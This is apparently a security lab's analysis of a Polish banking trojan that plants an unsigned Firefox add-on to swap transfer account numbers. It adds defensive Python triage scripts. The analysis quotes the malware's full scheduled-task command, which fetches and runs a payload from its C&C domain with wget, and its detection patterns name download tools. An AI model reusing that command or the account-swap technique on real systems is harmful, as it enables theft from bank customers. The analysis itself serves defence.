Banatrix successor – swapping account numbers with a Firefox add-on
Our laboratory recently received a sample of malware used in attacks on Polish users of electronic banking. Analysis of the sample gave us reason to believe that it was written by the authors of Banatrix (which we discussed in greater detail in our earlier posts), Slave and the e-mail campaign impersonating the Polish Post.
Step I: Extraction and addition of a scheduled task
Analysis shows that the most probable attack vector was downloading the malware from one of the popular file-sharing sites or a P2P network (a common Banatrix practice). The unsuspecting user downloads an infected file disguised as a program installer (e.g. Winamp, Corel PaintShop, PowerISO), drivers or a cracked game (e.g. Minecraft). In most cases the installer, in addition to doing what it advertises, also executes a dropper.
The dropper's function was to unpack a popular command-line download tool (wget.exe) and to add a Scheduled Task. This is an interesting alternative for obtaining persistence without adding an entry in the usual autostart registry keys (Run/RunOnce).
A sample scheduled task command:
cmd /R cd "C:\Documents and Settings\All Users\Application Data" & ping 18.104.22.168 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=YpXJRAmoSwKHkOamfqqM;winamp;1451925755 & start cmd /R dat.bmp
Read stage by stage: cmd changes into the All Users\Application Data directory; the ping with -n 300 -w 1000 is a stand-in for sleep (cmd has none) and delays execution by roughly five minutes; wget then downloads the next stage with unlimited retries (-t 0, --retry-connrefused), saving it under the innocuous name dat.bmp; finally the downloaded file is launched through cmd. The query string (data=ID;winamp;1451925755) is how the infected machine reported to the C&C server which trojanised installer it came from, when it was launched and when it last downloaded a payload. Although the idea behind this scheme is quite interesting, the execution is poor: in every analysed sample the C&C server address was hardcoded in the installer, so blocking or taking down that single domain neutralises the whole chain.
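As an added example (not code from the original analysis), the following Python triage script splits a Windows scheduled-task command line into its cmd stages and flags the pattern seen above: a ping used as a delay, a download tool writing to a non-executable file name, and cmd launching that file; it also decodes the beacon query string. The sample task lines are constructed for the demonstration, and reading the data= value as "ID;installer origin;Unix timestamp" is an assumption based on the command shown.

```python
"""Triage scheduled-task command lines for the dropper pattern above.
Added example; not part of the original analysis."""
import os
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit

# Constructed sample task command lines: the first mirrors the task from the
# analysis above, the second is a benign control.
SAMPLE_TASKS = [
    'cmd /R cd "C:\\Documents and Settings\\All Users\\Application Data" & '
    'ping 18.104.22.168 -n 300 -w 1000 & '
    'wget -t 0 --retry-connrefused -O dat.bmp '
    'http://blockchainin.in/dat.bmp?data=YpXJRAmoSwKHkOamfqqM;winamp;1451925755 & '
    'start cmd /R dat.bmp',
    'C:\\Program Files\\Updater\\updater.exe /silent',
]

STAGE_SPLIT = re.compile(r"\s&\s")  # cmd.exe command separator
PING_SLEEP = re.compile(r"^ping\s+\S+\s+-n\s+(\d+)", re.I)
DOWNLOADER = re.compile(
    r"^(wget|curl|certutil|bitsadmin)\b.*?\s(?:-O|-o|--output)\s+(\S+)", re.I)
START_CMD = re.compile(r"^start\s+cmd\s+/[RCK]\s+(\S+)", re.I)
URL = re.compile(r"https?://\S+")
EXEC_EXT = {".exe", ".bat", ".cmd", ".com", ".scr", ".ps1", ".vbs", ".js"}


def decode_beacon(url):
    """Split the data= parameter into the three fields seen in the sample.
    Assumed layout: infection ID; installer origin; Unix timestamp."""
    m = re.search(r"[?&]data=([^&\s]+)", url)
    if not m:
        return None
    parts = m.group(1).split(";")
    if len(parts) != 3 or not parts[2].isdigit():
        return None
    ident, origin, ts = parts
    return {
        "host": urlsplit(url).hostname,
        "id": ident,
        "origin": origin,
        "timestamp_utc": datetime.fromtimestamp(int(ts), tz=timezone.utc).isoformat(),
    }


def analyse_task(cmd):
    """Return the flags raised by one task command line plus any decoded beacon."""
    flags, beacon = [], None
    for stage in (s.strip() for s in STAGE_SPLIT.split(cmd)):
        m = PING_SLEEP.match(stage)
        if m and int(m.group(1)) >= 10:  # ~1 s per echo request on Windows
            flags.append(f"ping-as-sleep (~{m.group(1)}s delay)")
        m = DOWNLOADER.match(stage)
        if m:
            flags.append(f"downloader:{m.group(1).lower()}->{m.group(2)}")
            u = URL.search(stage)
            if u:
                beacon = decode_beacon(u.group(0))
        m = START_CMD.match(stage)
        if m and os.path.splitext(m.group(1))[1].lower() not in EXEC_EXT:
            flags.append(f"exec-non-executable:{m.group(1)}")
    # Two independent indicators on one task line is the threshold used here.
    return {"flags": flags, "beacon": beacon, "suspicious": len(flags) >= 2}


def triage(tasks):
    """Analyse every task line and keep only the suspicious ones."""
    return [r for r in (analyse_task(t) for t in tasks) if r["suspicious"]]


if __name__ == "__main__":
    for result in triage(SAMPLE_TASKS):
        print(result)
```

On a live host the input would come from schtasks /query /fo CSV /v or from the task XML under C:\Windows\System32\Tasks; the stage splitter only understands the single "&" separator used in the sample, so extend it for "&&" and "|" chains if your task export contains them.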
Step II: Downloading another file and extracting the Firefox add-on
The only purpose of the next downloaded file was to extract an add-on for the Mozilla Firefox browser. In this case we encountered only a Firefox add-on, but we cannot exclude the possibility that a Chrome extension is used as well.
The add-on is extracted to the standard Firefox add-ons folder.
The XPI file name is also hardcoded. After extraction into that folder, the add-on appears in the browser under the name Firefox Google Search.
Step III: Add-on analysis and account number swap
The add-on uses nsITraceableChannel, an XPCOM interface that lets an extension replace the stream listener (nsIStreamListener) of an HTTP channel with its own; the replacement receives every chunk of response data passing through the channel and is expected to forward it to the original listener, so the extension can observe (or modify) the traffic unnoticed. The technique is used by many legitimate add-ons, including ad blockers and Firebug, the popular developer tool. A small part of the add-on code responsible for copying the data is shown in the figure below; it looks like it was lifted from an online tutorial.
The add-on has two main functions:
- retrieving the account number to be substituted
- taking screenshots in the browser during a money transfer (including the amount) and sending them to the C&C
Below is the piece of code responsible for communication with the C&C:
The 'identyfikator' (ID) of each infected host is computed with:
Math.floor((Math.random() * 999888999) + 1000000)
That is a random integer between 1 000 000 and 1 000 888 998; it is not derived from any property of the host.
The request for the recipient account to be used in the transfer is made immediately before the transaction is submitted. In response, the browser receives a JavaScript file that is executed and contains not only the money mule's account number but also a list of services on which the swap must not be performed (Polish auction sites that pay through an intermediary) and limits on the minimum and maximum transfer amount.
The injected code makes sure the victim does not notice the swap: whatever account number is actually submitted to the bank, the page continues to display only the number the user typed in. The scam can still be caught by comparing the intended recipient account number with the one quoted in the bank's text message carrying the one-time confirmation code (mTAN), where that channel is enabled.
Because most of the malicious code is fetched from the C&C server only while the transfer is being made, the add-on itself is not detected as malicious by any antivirus engine. However, the add-on is not signed by addons.mozilla.org. Under Mozilla's add-on signing policy such an add-on is disabled automatically since Firefox 43 (the newest stable release at the time of writing), although in that version the requirement can still be switched off through the xpinstall.signatures.required preference. We therefore recommend updating the browser to the newest version and leaving signature enforcement on.
Polish malware authors keep looking for new ways of stealing money from infected users while minimising the risk of detection by antivirus engines. The analysed add-on shows that they deliberately leave transactions alone when the amount is too small or too large, and that the mule account number is requested only immediately before a transaction. In this scheme the criminals do not need to control any additional device (such as the victim's smartphone): the victim authorises the transfer with the mTAN themselves, trusting the recipient shown on screen, so a browser add-on is entirely sufficient.
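As an added example, not code from the original analysis, the following Python script audits the XPI files in a Firefox profile's extensions folder: for each add-on it reports the display name (from install.rdf or manifest.json), whether the package carries the addons.mozilla.org signature file (META-INF/mozilla.rsa) that Firefox 43 requires, and whether its scripts reference the nsITraceableChannel/nsIStreamListener interfaces the add-on above relies on. The profile, the XPI file name and the add-on ID are constructed for the demonstration (the real file name is hardcoded in the dropper and is not reproduced on this page), and the signature check is a presence check only, not a cryptographic verification of the PKCS#7 blob.

```python
"""Audit XPI files in a Firefox profile for missing AMO signatures and
response-interception APIs. Added example; not part of the original analysis."""
import json
import os
import tempfile
import xml.etree.ElementTree as ET
import zipfile

EM_NS = "http://www.mozilla.org/2004/em-rdf#"
SIGNATURE_MEMBER = "META-INF/mozilla.rsa"  # present in AMO-signed packages
SUSPICIOUS_APIS = ("nsITraceableChannel", "nsIStreamListener")

# Constructed install manifest; the add-on ID is hypothetical, the display
# name is the one the analysed add-on used.
INSTALL_RDF = """<?xml version="1.0"?>
<RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
     xmlns:em="http://www.mozilla.org/2004/em-rdf#">
  <Description about="urn:mozilla:install-manifest">
    <em:id>searchhelper@example.invalid</em:id>
    <em:name>Firefox Google Search</em:name>
    <em:version>1.0</em:version>
  </Description>
</RDF>
"""
# Constructed script fragment: only the interface name matters for the check.
BOOTSTRAP_JS = ("var Ci = Components.interfaces;\n"
                "channel.QueryInterface(Ci.nsITraceableChannel);\n")


def make_profile(root, signed):
    """Build a throwaway profile containing one XPI (hypothetical file name)."""
    ext_dir = os.path.join(root, "extensions")
    os.makedirs(ext_dir, exist_ok=True)
    path = os.path.join(ext_dir, "searchhelper@example.invalid.xpi")
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("install.rdf", INSTALL_RDF)
        z.writestr("bootstrap.js", BOOTSTRAP_JS)
        if signed:
            # Placeholder only: a real signed XPI carries an AMO-issued PKCS#7 blob here.
            z.writestr(SIGNATURE_MEMBER, b"")
    return path


def addon_name(z):
    """Display name from manifest.json (WebExtension) or install.rdf (legacy)."""
    names = z.namelist()
    if "manifest.json" in names:
        return json.loads(z.read("manifest.json")).get("name")
    if "install.rdf" in names:
        el = ET.fromstring(z.read("install.rdf")).find(f".//{{{EM_NS}}}name")
        return el.text if el is not None else None
    return None


def audit_xpi(path):
    """Name, signature presence and interception APIs used by one XPI."""
    with zipfile.ZipFile(path) as z:
        names = z.namelist()
        apis = sorted({api for n in names if n.endswith(".js")
                       for api in SUSPICIOUS_APIS
                       if api in z.read(n).decode("utf-8", "replace")})
        return {"file": os.path.basename(path), "name": addon_name(z),
                "signed": SIGNATURE_MEMBER in names, "apis": apis}


def audit_profile(profile_dir):
    """Audit every .xpi in <profile>/extensions (unpacked add-ons are not covered)."""
    ext_dir = os.path.join(profile_dir, "extensions")
    if not os.path.isdir(ext_dir):
        return []
    return [audit_xpi(os.path.join(ext_dir, fn))
            for fn in sorted(os.listdir(ext_dir)) if fn.lower().endswith(".xpi")]


def demo(signed=False):
    """Run the audit against a constructed profile and return its findings."""
    with tempfile.TemporaryDirectory() as tmp:
        make_profile(tmp, signed)
        return audit_profile(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point audit_profile at a real profile directory (the one listed in about:profiles) to use it on a host; an unsigned entry whose scripts touch nsITraceableChannel is worth pulling for analysis regardless of what name it shows in the add-on manager.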
Analysed samples:
- I dropper – program installer
- II dropper – dat.bmp